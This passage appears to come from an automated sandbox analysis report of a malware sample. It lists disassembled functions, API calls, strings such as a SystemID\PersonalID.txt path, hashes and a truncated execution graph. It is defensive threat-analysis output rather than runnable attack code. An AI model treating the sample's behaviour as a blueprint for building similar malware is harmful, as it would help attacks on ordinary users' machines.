                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 5422b80afd5a990f0a87bfa599f2628a59f21c03b10c51dbb3c2e42a56bf77d7
                                                                                                                                                                        • Instruction ID: 7b794273970480c62e98a6a457eb00d663ccb297d585f3a94b9e4ee660671495
                                                                                                                                                                        • Opcode Fuzzy Hash: 5422b80afd5a990f0a87bfa599f2628a59f21c03b10c51dbb3c2e42a56bf77d7
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C13730608209DBCF24CF58D9C09AAB3F6FFC6300B6045ADE8468B655DBB0ED55CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA7D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 38c1875bbdf726474bca01cfdb54f9dcf6bc1a929a0d3e988b1ee2ac94d01c30
                                                                                                                                                                        • Instruction ID: b3546e2a3a91d758772cae1a3d3dea43e240cdfa73aac01197ffa5012201395a
                                                                                                                                                                        • Opcode Fuzzy Hash: 38c1875bbdf726474bca01cfdb54f9dcf6bc1a929a0d3e988b1ee2ac94d01c30
                                                                                                                                                                        • Instruction Fuzzy Hash: 10517D7164C20A9BCF24DF18DDC08AEB7EAFF86301B2045ADE8558B251DB31ED558BE0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAB185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00BAB1BA
                                                                                                                                                                          • Part of subcall function 00BA11C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 00BA120F
                                                                                                                                                                          • Part of subcall function 00BA11C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00BA1228
                                                                                                                                                                          • Part of subcall function 00BA11C0: CloseHandle.KERNEL32(00000000), ref: 00BA123D
                                                                                                                                                                          • Part of subcall function 00BA11C0: MoveFileW.KERNEL32(?,?), ref: 00BA1277
                                                                                                                                                                          • Part of subcall function 00BABA10: LoadCursorW.USER32(00000000,00007F00), ref: 00BABA4A
                                                                                                                                                                          • Part of subcall function 00BABA10: RegisterClassExW.USER32(00000030), ref: 00BABA73
                                                                                                                                                                          • Part of subcall function 00BABA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00BABAAD
                                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BAB4B3
                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00BAB4CD
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAB4D7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                                        • API String ID: 441990211-897913220
                                                                                                                                                                        • Opcode ID: 3255642e4c098b2fe905af759454c32ba275ca0c351d1360456bea55e24ea3c3
                                                                                                                                                                        • Instruction ID: e871252bbdca91608a7e02f4d3baa8cf1ff106c30dad0d15fc702a6ed6aefb5e
                                                                                                                                                                        • Opcode Fuzzy Hash: 3255642e4c098b2fe905af759454c32ba275ca0c351d1360456bea55e24ea3c3
                                                                                                                                                                        • Instruction Fuzzy Hash: E851E37151C3449BC718FB74C866AEEB7E8BF96344F4049ADF49643162EF309A09CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BEAD50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                                                                                        • API String ID: 2102423945-294840303
                                                                                                                                                                        • Opcode ID: 8e01b5387a4a64d9815451896e8e17a5acb6d126c0b059b848ea37bb00ba8be3
                                                                                                                                                                        • Instruction ID: 495f5323c01fd353c3d47425f07e5663073cd07d3b1d16bb2ba07b93724b08a7
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e01b5387a4a64d9815451896e8e17a5acb6d126c0b059b848ea37bb00ba8be3
                                                                                                                                                                        • Instruction Fuzzy Hash: 2721FFB6B442217BE204666DFC82B66B3C9EB94B15F10857AF61CDB2C1E3B0BC5087D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA3C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA3CA0
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA3C83
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                                                                                        • Opcode ID: 7a99450e57cf927f470cd4cca7db17a6dd5266a5449de383a87298284d977253
                                                                                                                                                                        • Instruction ID: fe31d49e175130f47541366462657e4ee0c0358d8c34ef4921267f2f082ec87d
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a99450e57cf927f470cd4cca7db17a6dd5266a5449de383a87298284d977253
                                                                                                                                                                        • Instruction Fuzzy Hash: B0019EB29047016BD3309F19E8017A7F6E8EF51B64F20846EF9A993781F7B1E944C791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2590308727-54166481
                                                                                                                                                                        • Opcode ID: 9859cf3bf2ec8969d736c6892436269dc15502ff93185b12586023d4b910b9bc
                                                                                                                                                                        • Instruction ID: 6e6b1451aefaedc85b797c333aa41b5d1618fd42510aef7ff4e25ed6207e1ef0
                                                                                                                                                                        • Opcode Fuzzy Hash: 9859cf3bf2ec8969d736c6892436269dc15502ff93185b12586023d4b910b9bc
                                                                                                                                                                        • Instruction Fuzzy Hash: B011E072D003059BDF31EF68DC467AE7BE0EF10318F1006B9EC5A56191E3B69A248BD6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB0DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00BB0E13
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __calloc_crt
                                                                                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                                                                        • API String ID: 3494438863-969893948
                                                                                                                                                                        • Opcode ID: 5a5357e9d3405a806e0537da8149e8664693a82de619507ac29cfb11b2f7ce15
                                                                                                                                                                        • Instruction ID: ab45dc498bcc10fb699128bc8d5b7ca5043716cfbe5aa0003cf27f883d01bc07
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a5357e9d3405a806e0537da8149e8664693a82de619507ac29cfb11b2f7ce15
                                                                                                                                                                        • Instruction Fuzzy Hash: FDF0AFB17196119FEB24AB69BC51BFA27D8E701720F1005AAF200CB1E0EBB4C8408695
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C10620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00C10686
                                                                                                                                                                          • Part of subcall function 00BE4C00: _raise.LIBCMT ref: 00BE4C18
                                                                                                                                                                        Strings
                                                                                                                                                                        • .\crypto\evp\digest.c, xrefs: 00C10638
                                                                                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00C1062E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset_raise
                                                                                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                                                                                        • Opcode ID: 32ec546d98c41d3935baa6bd1a205643af333bcb26953fd5a2ecaae3244242cd
                                                                                                                                                                        • Instruction ID: 77a43228e8f1018fab35f714dd25c5014fe4b4c519b5b4bc633e86866c4ff27f
                                                                                                                                                                        • Opcode Fuzzy Hash: 32ec546d98c41d3935baa6bd1a205643af333bcb26953fd5a2ecaae3244242cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 43014B75600200AFC310DF48EC42E6AB7E5AFC9304F294468F988DB362D7A1ED95DB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:6.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:14.6%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:190
                                                                                                                                                                        execution_graph 39846 334c30 39849 300c62 39846->39849 39850 300cdd 39849->39850 39859 300c6e 39849->39859 39873 30793d DecodePointer 39850->39873 39852 300ce3 39853 305208 __wopenfile 57 API calls 39852->39853 39856 300cd5 39853->39856 39855 300ca1 RtlAllocateHeap 39855->39856 39855->39859 39858 300cc9 39870 305208 39858->39870 39859->39855 39859->39858 39860 300c79 39859->39860 39864 300cc7 39859->39864 39869 30793d DecodePointer 39859->39869 39860->39859 39866 307f51 58 API calls __NMSG_WRITE 39860->39866 39867 307fae 58 API calls 5 library calls 39860->39867 39868 307b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 39860->39868 39865 305208 __wopenfile 57 API calls 39864->39865 39865->39856 39866->39860 39867->39860 39869->39859 39874 30501f GetLastError 39870->39874 39872 30520d 39872->39864 39873->39852 39888 312534 39874->39888 39876 305034 39877 305082 SetLastError 39876->39877 39891 308c96 39876->39891 39877->39872 39881 30505b 39882 305061 39881->39882 39883 305079 39881->39883 39898 30508e 58 API calls 4 library calls 39882->39898 39899 300bed 39883->39899 39886 305069 GetCurrentThreadId 39886->39877 39887 30507f 39887->39877 39889 312547 39888->39889 39890 31254b TlsGetValue 39888->39890 39889->39876 39890->39876 39892 308c9d 39891->39892 39894 305047 39892->39894 39896 308cbb 39892->39896 39905 31b813 39892->39905 39894->39877 39897 312553 TlsSetValue 39894->39897 39896->39892 39896->39894 39913 3129c9 Sleep 39896->39913 39897->39881 39898->39886 39900 300c1f __dosmaperr 39899->39900 39901 300bf6 HeapFree 39899->39901 39900->39887 39901->39900 39902 300c0b 39901->39902 39903 305208 __wopenfile 56 API calls 39902->39903 39904 300c11 GetLastError 39903->39904 39904->39900 39906 31b81e 39905->39906 39911 31b839 39905->39911 39907 31b82a 39906->39907 39906->39911 39908 305208 __wopenfile 57 API calls 39907->39908 39910 31b82f 39908->39910 39909 31b849 HeapAlloc 39909->39910 39909->39911 39910->39892 39911->39909 39911->39910 39914 30793d DecodePointer 39911->39914 39913->39896 39914->39911 39915 303f84 39916 303f90 _raise 39915->39916 39952 312603 GetStartupInfoW 39916->39952 39919 303fed 39921 303ff8 39919->39921 40283 30411a 58 API calls 3 library calls 39919->40283 39920 303f95 39954 3078d5 GetProcessHeap 39920->39954 39955 305141 39921->39955 39924 303ffe 39925 304009 __RTC_Initialize 39924->39925 40284 30411a 58 API calls 3 library calls 39924->40284 39976 308754 39925->39976 39928 304018 39929 304024 GetCommandLineW 39928->39929 40285 30411a 58 API calls 3 library calls 39928->40285 39995 31235f GetEnvironmentStringsW 39929->39995 39932 304023 39932->39929 39935 30403e 39936 304049 39935->39936 40286 307c2e 58 API calls 3 library calls 39935->40286 40005 3121a1 39936->40005 39940 30405a 40019 307c68 39940->40019 39943 304062 39945 30406d __wwincmdln 39943->39945 40288 307c2e 58 API calls 3 library calls 39943->40288 40025 2f9f90 39945->40025 39947 304081 39948 304090 39947->39948 40289 307f3d 58 API calls _doexit 39947->40289 40290 307c59 58 API calls _doexit 39948->40290 39951 304095 _raise 39953 312619 39952->39953 39953->39920 39954->39919 40291 307d6c 36 API calls 2 library calls 39955->40291 39957 305146 40292 308c48 InitializeCriticalSectionAndSpinCount __getstream 39957->40292 39959 30514b 39960 30514f 39959->39960 40294 3124f7 TlsAlloc 39959->40294 40293 3051b7 61 API calls 2 library calls 39960->40293 39963 305161 39963->39960 39965 30516c 39963->39965 39964 305154 39964->39924 39966 308c96 __calloc_crt 58 API calls 39965->39966 39967 305179 39966->39967 39968 3051ae 39967->39968 40295 312553 TlsSetValue 39967->40295 40297 3051b7 61 API calls 2 library calls 39968->40297 39971 30518d 39971->39968 39973 305193 39971->39973 39972 3051b3 39972->39924 40296 30508e 58 API calls 4 library calls 39973->40296 39975 30519b GetCurrentThreadId 39975->39924 39977 308760 _raise 39976->39977 40298 308af7 39977->40298 39979 308767 39980 308c96 __calloc_crt 58 API calls 39979->39980 39981 308778 39980->39981 39982 3087e3 GetStartupInfoW 39981->39982 39985 308783 _raise @_EH4_CallFilterFunc@8 39981->39985 39983 308927 39982->39983 39984 3087f8 39982->39984 39986 3089ef 39983->39986 39989 308974 GetStdHandle 39983->39989 39990 308987 GetFileType 39983->39990 40306 31263e InitializeCriticalSectionAndSpinCount 39983->40306 39984->39983 39988 308c96 __calloc_crt 58 API calls 39984->39988 39991 308846 39984->39991 39985->39928 40307 3089ff LeaveCriticalSection _doexit 39986->40307 39988->39984 39989->39983 39990->39983 39991->39983 39992 30887a GetFileType 39991->39992 40305 31263e InitializeCriticalSectionAndSpinCount 39991->40305 39992->39991 39996 304034 39995->39996 39997 312370 39995->39997 40001 311f64 GetModuleFileNameW 39996->40001 39998 308cde __malloc_crt 58 API calls 39997->39998 39999 312396 _signal 39998->39999 40000 3123ac FreeEnvironmentStringsW 39999->40000 40000->39996 40002 311f98 _wparse_cmdline 40001->40002 40003 308cde __malloc_crt 58 API calls 40002->40003 40004 311fd8 _wparse_cmdline 40002->40004 40003->40004 40004->39935 40006 3121ba __wsetenvp 40005->40006 40010 30404f 40005->40010 40007 308c96 __calloc_crt 58 API calls 40006->40007 40015 3121e3 __wsetenvp 40007->40015 40008 31223a 40009 300bed _free 58 API calls 40008->40009 40009->40010 40010->39940 40287 307c2e 58 API calls 3 library calls 40010->40287 40011 308c96 __calloc_crt 58 API calls 40011->40015 40012 31225f 40013 300bed _free 58 API calls 40012->40013 40013->40010 40015->40008 40015->40010 40015->40011 40015->40012 40016 312276 40015->40016 40345 30962f 58 API calls __wopenfile 40015->40345 40346 3042fd 8 API calls 2 library calls 40016->40346 40018 312282 40021 307c74 __IsNonwritableInCurrentImage 40019->40021 40347 31aeb5 40021->40347 40022 307c92 __initterm_e 40024 307cb1 __cinit __IsNonwritableInCurrentImage 40022->40024 40350 3019ac 67 API calls __cinit 40022->40350 40024->39943 40026 2f9fa0 __ftell_nolock 40025->40026 40351 2ecf10 40026->40351 40028 2f9fb0 40029 2f9fc4 GetCurrentProcess GetLastError SetPriorityClass 40028->40029 40030 2f9fb4 40028->40030 40031 2f9fe6 40029->40031 40032 2f9fe4 GetLastError 40029->40032 40778 2f24e0 109 API calls _memset 40030->40778 40365 2fd3c0 40031->40365 40032->40031 40035 2f9fb9 40035->39947 40037 2fb669 40811 32f23e 40037->40811 40038 2fa022 40368 2fd340 40038->40368 40040 2fb673 40041 32f23e 59 API calls 40040->40041 40043 2fb67d 40041->40043 40045 2fa065 40373 2f3a90 40045->40373 40049 2fa159 GetCommandLineW CommandLineToArgvW lstrcpyW 40050 2fa33d GlobalFree 40049->40050 40065 2fa196 40049->40065 40051 2fa45c 40050->40051 40052 2fa354 40050->40052 40429 2f2220 40051->40429 40054 2f2220 76 API calls 40052->40054 40053 2fa100 40053->40049 40056 2fa359 40054->40056 40058 2fa466 40056->40058 40444 2eef50 40056->40444 40057 2fa1cc lstrcmpW lstrcmpW 40057->40065 40058->39947 40060 2fa24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 40060->40065 40061 2fa48f 40064 2fa4ef 40061->40064 40449 2f3ea0 40061->40449 40063 300235 60 API calls _W_store_winword 40063->40065 40067 2f1cd0 92 API calls 40064->40067 40065->40050 40065->40057 40065->40060 40065->40063 40066 2fa361 40065->40066 40389 303c92 40066->40389 40069 2fa563 40067->40069 40071 2fa57e 40069->40071 40082 2fa5f5 40069->40082 40784 2f4690 40071->40784 40072 2fa395 OpenProcess 40074 2fa3a9 WaitForSingleObject CloseHandle 40072->40074 40075 2fa402 40072->40075 40074->40075 40080 2fa3cb 40074->40080 40392 2f1cd0 40075->40392 40076 2fa6f9 40808 2f1a10 8 API calls 40076->40808 40077 2fa5a9 40083 2f4690 59 API calls 40077->40083 40097 2fa3d4 Sleep 40080->40097 40098 2fa3e2 GlobalFree 40080->40098 40779 2f1ab0 PeekMessageW 40080->40779 40081 2fa6fe 40085 2fa70f 40081->40085 40086 2fa8b6 CreateMutexA 40081->40086 40082->40076 40082->40081 40102 2fa5db 40082->40102 40088 2fa5d4 40083->40088 40084 2fa40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 40089 2fa451 40084->40089 40090 2fa7dc 40085->40090 40103 2eef50 58 API calls 40085->40103 40091 2fa8ca 40086->40091 40807 2ed240 132 API calls 4 library calls 40088->40807 40089->39947 40093 2eef50 58 API calls 40090->40093 40096 2eef50 58 API calls 40091->40096 40092 2fa624 GetVersion 40092->40076 40094 2fa632 lstrcpyW lstrcatW lstrcatW 40092->40094 40099 2fa7ec 40093->40099 40100 2fa674 _memset 40094->40100 40107 2fa8da 40096->40107 40097->40072 40101 2fa3f7 40098->40101 40104 2fa7f1 lstrlenA 40099->40104 40106 2fa6b4 ShellExecuteExW 40100->40106 40101->39947 40102->40082 40102->40086 40102->40092 40110 2fa72f 40103->40110 40105 300c62 _malloc 58 API calls 40104->40105 40108 2fa810 _memset 40105->40108 40106->40081 40109 2fa6e3 40106->40109 40111 2f3ea0 59 API calls 40107->40111 40124 2fa92f 40107->40124 40113 2fa81e MultiByteToWideChar lstrcatW 40108->40113 40126 2fa9d1 40109->40126 40112 2f3ea0 59 API calls 40110->40112 40115 2fa780 40110->40115 40111->40107 40112->40110 40113->40104 40114 2fa847 lstrlenW 40113->40114 40116 2fa856 40114->40116 40117 2fa8a0 CreateMutexA 40114->40117 40118 2fa79c CreateThread 40115->40118 40119 2fa792 40115->40119 40470 2ee760 40116->40470 40117->40091 40118->40090 40123 2fa7d0 40118->40123 42154 2fdbd0 95 API calls 4 